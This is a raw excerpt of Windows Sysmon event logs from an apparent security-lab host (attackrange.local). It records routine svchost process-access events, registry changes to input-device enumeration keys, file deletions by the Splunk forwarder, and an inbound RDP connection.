12:24:42.958{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1500-00000000BB01}1104C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292086Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.957{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292085Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.957{BEA10069-D0C2-6086-0C00-00000000BB01}7284952C:\Windows\system32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292084Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.957{BEA10069-D0C2-6086-0C00-00000000BB01}7284952C:\Windows\system32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292083Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.957{BEA10069-D0C2-6086-0C00-00000000BB01}7284952C:\Windows\system32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|c:\windows\system32\lsm.dll+23c29|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292082Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.957{BEA10069-D0C2-6086-0C00-00000000BB01}7284952C:\Windows\system32\svchost.exe{BEA10069-028A-6088-062A-00000000BB01}4444C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+23c18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292081Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.957{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292080Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.957{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-D0C2-6086-1000-00000000BB01}944C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292079Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.957{BEA10069-D0C2-6086-0C00-00000000BB01}7284952C:\Windows\system32\svchost.exe{BEA10069-D4AF-6086-5601-00000000BB01}436C:\Windows\Explorer.EXE0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292078Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.956{BEA10069-D0C2-6086-0C00-00000000BB01}7285416C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000292077Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:40.921{BEA10069-D0C2-6086-0F00-00000000BB01}936C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse174.27.152.255-51110-false10.0.1.15win-host-96.attackrange.local3389ms-wbt-server 354300x8000000000000000292076Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:40.432{BEA10069-D145-6086-C700-00000000BB01}2620C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-96.attackrange.local50631-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 13241300x8000000000000000292075Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-SetValue2021-04-27 12:24:42.893{BEA10069-D0B7-6086-0100-00000000BB01}4SystemHKLM\System\CurrentControlSet\Services\kbdclass\Enum\NextInstanceDWORD (0x00000001) 13241300x8000000000000000292074Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-SetValue2021-04-27 12:24:42.893{BEA10069-D0B7-6086-0100-00000000BB01}4SystemHKLM\System\CurrentControlSet\Services\kbdclass\Enum\CountDWORD (0x00000001) 12241200x8000000000000000292073Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-DeleteValue2021-04-27 12:24:42.893{BEA10069-D0B7-6086-0100-00000000BB01}4SystemHKLM\System\CurrentControlSet\Services\kbdclass\Enum\1 13241300x8000000000000000292072Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-SetValue2021-04-27 12:24:42.893{BEA10069-D0B7-6086-0100-00000000BB01}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\NextInstanceDWORD (0x00000000) 13241300x8000000000000000292071Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-SetValue2021-04-27 12:24:42.893{BEA10069-D0B7-6086-0100-00000000BB01}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\CountDWORD (0x00000000) 12241200x8000000000000000292070Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-DeleteValue2021-04-27 12:24:42.893{BEA10069-D0B7-6086-0100-00000000BB01}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\0 23542300x8000000000000000292069Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.840{BEA10069-D14B-6086-D000-00000000BB01}3836NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4FB4E4746B3EBAE5EC753B09624782B1,SHA256=0EFE80015D2D26FC05FB94F96E0A867293B96B488E4BDC89E04B191BE63B4FC7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000292068Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.840{BEA10069-028A-6088-062A-00000000BB01}4444NT AUTHORITY\SYSTEMC:\Windows\system32\LogonUI.exeC:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\1033\StructuredQuerySchema.binMD5=E871053170AD09568882637D049295DC,SHA256=CEA9EABB0B46AC602CDC3FB6FE6215981F2D7C0C6A5C5023CE72860232DBE12B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000292067Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.824{BEA10069-D0C2-6086-0C00-00000000BB01}7285544C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292066Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.824{BEA10069-D0C2-6086-0C00-00000000BB01}7285544C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 13241300x8000000000000000292065Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-SetValue2021-04-27 12:24:42.824{BEA10069-D0B7-6086-0100-00000000BB01}4SystemHKLM\System\CurrentControlSet\Services\mouclass\Enum\NextInstanceDWORD (0x00000001) 13241300x8000000000000000292064Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-SetValue2021-04-27 12:24:42.824{BEA10069-D0B7-6086-0100-00000000BB01}4SystemHKLM\System\CurrentControlSet\Services\mouclass\Enum\CountDWORD (0x00000001) 12241200x8000000000000000292063Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-DeleteValue2021-04-27 12:24:42.824{BEA10069-D0B7-6086-0100-00000000BB01}4SystemHKLM\System\CurrentControlSet\Services\mouclass\Enum\1 13241300x8000000000000000292062Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-SetValue2021-04-27 12:24:42.824{BEA10069-D0B7-6086-0100-00000000BB01}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\NextInstanceDWORD (0x00000001) 13241300x8000000000000000292061Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-SetValue2021-04-27 12:24:42.824{BEA10069-D0B7-6086-0100-00000000BB01}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\CountDWORD (0x00000001) 12241200x8000000000000000292060Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-DeleteValue2021-04-27 12:24:42.824{BEA10069-D0B7-6086-0100-00000000BB01}4SystemHKLM\System\CurrentControlSet\Services\terminpt\Enum\1 10341000x8000000000000000292059Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.808{BEA10069-D0C2-6086-0C00-00000000BB01}7285544C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292058Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.808{BEA10069-D0C2-6086-0C00-00000000BB01}7285544C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292057Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.808{BEA10069-D0C2-6086-0C00-00000000BB01}7285544C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292056Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.808{BEA10069-D0C2-6086-0C00-00000000BB01}7285544C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292055Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.808{BEA10069-D0C2-6086-0C00-00000000BB01}7285544C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292054Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.808{BEA10069-D0C2-6086-0C00-00000000BB01}7285544C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292053Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.808{BEA10069-D0C2-6086-0C00-00000000BB01}7285544C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292052Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 12:24:42.808{BEA10069-D0C2-6086-0C00-00000000BB01}7285544C:\Windows\system32\svchost.exe{BEA10069-028A-6088-082A-00000000BB01}5840C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000292051Microsoft-Windows-Sysmon/Operationalwin-host-96.attackrange.local-2021-04-27 